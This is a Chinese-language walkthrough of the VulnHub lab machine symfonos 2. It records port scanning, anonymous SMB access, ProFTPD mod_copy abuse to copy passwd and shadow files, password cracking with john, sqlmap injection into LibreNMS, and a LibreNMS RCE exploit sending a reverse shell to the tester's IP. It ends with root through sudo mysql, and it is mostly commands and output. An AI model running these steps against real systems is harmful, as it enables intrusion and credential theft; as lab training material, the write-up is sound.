【攻略鸭】symfonos 2_VulnHub靶机攻略
本文内容纯属虚构,求关注点赞支持!
将靶机网络连接设置成为NAT。
靶机IP地址:192.168.31.244
测试机IP地址:192.168.31.37
外部信息收集
访问http://192.168.31.145/只显示了一个图片。
端口扫描
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 ProFTPD 1.3.5
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http syn-ack ttl 64 WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
Host script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h27m50s, median: 0s
| smb-security-mode:
| account_used: guest
137/udp open netbios-ns
161/udp open snmp
网站目录枚举
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.244/FUZZ
没结果
SMB空口令登录
smb://192.168.31.244/anonymous/backups/log.txt 查看内容:
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
[anonymous]
path = /home/aeolus/share
browseable = yes
read only = yes
guest ok = yes
root@symfonos2:~# cat /usr/local/etc/proftpd.conf
# Set the user and group under which the server will run.
User aeolus
Group aeolus
<Anonymous ~ftp>
User ftp
Group ftp
(此处应当对aeolus和ftp进行SSH和FTP服务的口令枚举)
FTP服务检测
21端口匿名访问失败
$ searchsploit ProFTPD
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
$ searchsploit -m 36742.txt
失败
$ searchsploit -m 49908.py
Exploit Completed
[!] Something Went Wrong
[!] Directory might not be writable
$ searchsploit -m 36803.py
$ python2 36803.py 192.168.31.244 /var/www/html id
[ - ] Error : 404 [ - ]
$ searchsploit -m 37262.rb
msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
[-] 192.168.31.244:80 - Exploit aborted due to failure: unknown: 192.168.31.244:21 - Failure copying PHP payload to website path, directory not writable?
以上问题出在网站目录不可写入,其他可写入目录需要想办法读取。
利用ProFTPd文件复制漏洞
想起了SMB空口令登录可访问的共享文件夹/home/aeolus/share
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /home/aeolus/share
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > exploit
[*] 192.168.31.244:80 - 192.168.31.244:21 - Sending copy commands to FTP server
[*] 192.168.31.244:80 - Executing PHP payload /8N231L.php
[-] 192.168.31.244:80 - Exploit aborted due to failure: unknown: 192.168.31.244:21 - Failure executing payload
访问smb://192.168.31.244/anonymous/发现文件/8N231L.php已经写入。
重新使用36742.txt,利用ProFTPd文件复制漏洞将靶机哈希文件复制到/home/aeolus/share:
$ ftp
ftp> o
(to) 192.168.31.244
Connected to 192.168.31.244.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.31.244]
Name (192.168.31.244:kali):
331 Password required for kali
Password:
530 Login incorrect.
ftp: Login failed
site cpfr /etc/passwd
site cpto /home/aeolus/share/passwd.copy
ftp> site cpfr /etc/shadow
350 File or directory exists, ready for destination name
ftp> site cpto /home/aeolus/share/shadow.copy
550 cpto: Permission denied
ftp> site cpfr /var/backups/shadow.bak
350 File or directory exists, ready for destination name
ftp> site cpto /home/aeolus/share/shadow.copy
250 Copy successful
通过SMB空口令访问导出的哈希文件:
smb://192.168.31.244/anonymous/passwd.copy
root:x:0:0:root:/root:/bin/bash
...
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
aeolus:x:1000:1000:,,,:/home/aeolus:/bin/bash
cronus:x:1001:1001:,,,:/home/cronus:/bin/bash
mysql:x:110:114:MySQL Server,,,:/nonexistent:/bin/false
Debian-snmp:x:111:115::/var/lib/snmp:/bin/false
librenms:x:999:999::/opt/librenms:
smb://192.168.31.244/anonymous/shadow.copy
root:$6$VTftENaZ$ggY84BSFETwhissv0N6mt2VaQN9k6/HzwwmTtVkDtTbCbqofFO8MVW.IcOKIzuI07m36uy9.565qelr/beHer.:18095:0:99999:7:::
aeolus:$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:18095:0:99999:7:::
cronus:$6$wOmUfiZO$WajhRWpZyuHbjAbtPDQnR3oVQeEKtZtYYElWomv9xZLOhz7ALkHUT2Wp6cFFg1uLCq49SYel5goXroJ0SxU3D/:18095:0:99999:7:::
librenms:!:18095::::::
查了下LibreNMS,是开源的SNMP设备监控程序
使用john破解口令:
$ unshadow passwd.copy shadow.copy > unshadowed.txt
删去无用的用户信息。
$ john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
sergioteamo (aeolus)
$ ssh aeolus@192.168.31.244
aeolus@symfonos2:~$ id
uid=1000(aeolus) gid=1000(aeolus) groups=1000(aeolus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
权限提升
内核提权
$ searchsploit Linux Kernel 4.9
未找到合适的提权漏洞。
aeolus@symfonos2:/tmp$ gcc CVE-2019-13272.c -o exp
aeolus@symfonos2:/tmp$ ./exp
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[-] Could not find pkexec executable at /usr/bin/pkexec
aeolus用户sudo提权
$ sudo -V
Sudo version 1.8.19p1
aeolus@symfonos2:/tmp$ sudo -u#-1 /bin/bash
[sudo] password for aeolus:
aeolus is not in the sudoers file.
查看端口信息
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 50 *:139 *:*
tcp LISTEN 0 128 127.0.0.1:8080 *:*
tcp LISTEN 0 32 *:21 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 20 127.0.0.1:25 *:*
tcp LISTEN 0 50 *:445 *:*
tcp LISTEN 0 50 :::139 :::*
tcp LISTEN 0 64 :::80 :::*
tcp LISTEN 0 128 :::22 :::*
tcp LISTEN 0 20 ::1:25 :::*
tcp LISTEN 0 50 :::445 :::*
仅能本地访问127.0.0.1:8080
SSH本地端口转发
┌──(kali)-[~/pentest]
└─$ ssh -N -f -L 8999:127.0.0.1:8080 aeolus@192.168.31.244
aeolus@192.168.31.244's password:
┌──(kali)-[~/pentest]
└─$ firefox http://127.0.0.1:8999
http://127.0.0.1:8999/login
$ searchsploit -m 48453.txt
需要LibreNMS用户登录
http://127.0.0.1:8999/ajax_search.php?search=%27&type=group
存在SQL注入点
sqlmap -u "127.0.0.1:8999/ajax_search.php?search=1*&type=group" --cookie="PHPSESSID=tbvducu8v4cvcrko7cllj1ika6; XSRF-TOKEN=eyJpdiI6Im1UcnZ3ZE11a2VpOU8ycnhNdFFYb3c9PSIsInZhbHVlIjoieldlMGZuSzJvenlrZkZoZTJaVTQ5cCtiU1FoZGhRbVpxSDNBN0NYSDc3VEcrMjQzVlJBUzJpN3RrSUlLVTQ5OStxMlhzZm8zQytpRjV4dktGbjhWRHc9PSIsIm1hYyI6IjA0MjBiOTJlNGEwNzgxYTVlYTcwMWE2ZjQzOTM4NWJmZjBmZTI5MWYxZmIyNjMwN2YzMzAzODlkNzg1YzEzOWIifQ%3D%3D; librenms_session=eyJpdiI6InYxXC9uK0owOGs1SCtIdTBWN0xncU5BPT0iLCJ2YWx1ZSI6IitoWUhSQjBcL25pQytXbmNzcEI1NmNKWHRLd1k1OFh5ME8zOXZpTXhOTkRWY0lLVElEaWpZQlVrQmtqdCtMeUZNXC94c1JoZVcycThGa1VTVzRPYWF3WlE9PSIsIm1hYyI6IjUwYzAxYmJkOTE4NzMwYWUyNzdlZmJjYjdlMDRjNDNmNThkMGI0N2MyOWM1MTM0NTdkZDY0ZGJiMDNkNWMwZTYifQ%3D%3D" --batch --dbs
available databases [2]:
[*] information_schema
[*] librenms
$ searchsploit -m 47044.py
CVE-2018-20434 LibreNMS 1.46 - 'addhost' RCE漏洞
漏洞触发在LibreNMS 1.46及之前版本中的capture.inc.php文件,需要LibreNMS用户登录。
测试用aeolus:sergioteamo登录http://127.0.0.1:8999 跳转至http://127.0.0.1:8999/addhost获取到cookie。
$ nc -nvlp 5433
$ python2 47044.py http://127.0.0.1:8999 "PHPSESSID=3t1mq50uvdkdt0qg04atr1pl02; XSRF-TOKEN=eyJpdiI6ImNcL0lPcXhKOFwvWFdzbnBNZG9xSFREQT09IiwidmFsdWUiOiJDc01rXC9uRHhDcnF3SSsrV0hpQURqQzR3RjkwVVgyTDlpZlE5bWNuNzhGK1NqOWpvaWdzK2R1MHB0WEZIYVRaTGVwNWgwakNrWHF4ZlwvSHprRCtWQVBBPT0iLCJtYWMiOiJlOTAwNTA1OGUzMTBkM2RiMDZkZWRjNjUxOWQ5NzBhNmFkN2QxNzRkMTc1ZWZkOTEzMWExZTdhNDcwNWY2MTMyIn0%3D; librenms_session=eyJpdiI6IlNxYyt0eEFXVDcrUTRcLzZjdlgxU3Z3PT0iLCJ2YWx1ZSI6InNlZFwvUkhicHN6d1dWMEVGK0JMbThZcTFWSnZOQjBmUVhMRWxoTUE2Sk83K1NaN09tTktYamFHNGlVcGJwWElVcEdxVUdHeVdUSVlmWUxCbEVzK2xqZz09IiwibWFjIjoiZmRhYTBmZTc0YzY2ODFkMWYxYjAzNDQyOGY3Yjk5NGJmM2JkMjNhZjZiYWQyOTY1OGExODc3ODVkZDA3ZjRiZSJ9" 192.168.31.37 5433
[+] Device Created Sucssfully
查看反弹shell:
$ id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
sudo提权
$ sudo -l
User cronus may run the following commands on symfonos2:
(root) NOPASSWD: /usr/bin/mysql
$ sudo mysql -e '\! /bin/sh'
id
uid=0(root) gid=0(root) groups=0(root)
其他
flag
cat /root/proof.txt
Congrats on rooting symfonos:2!
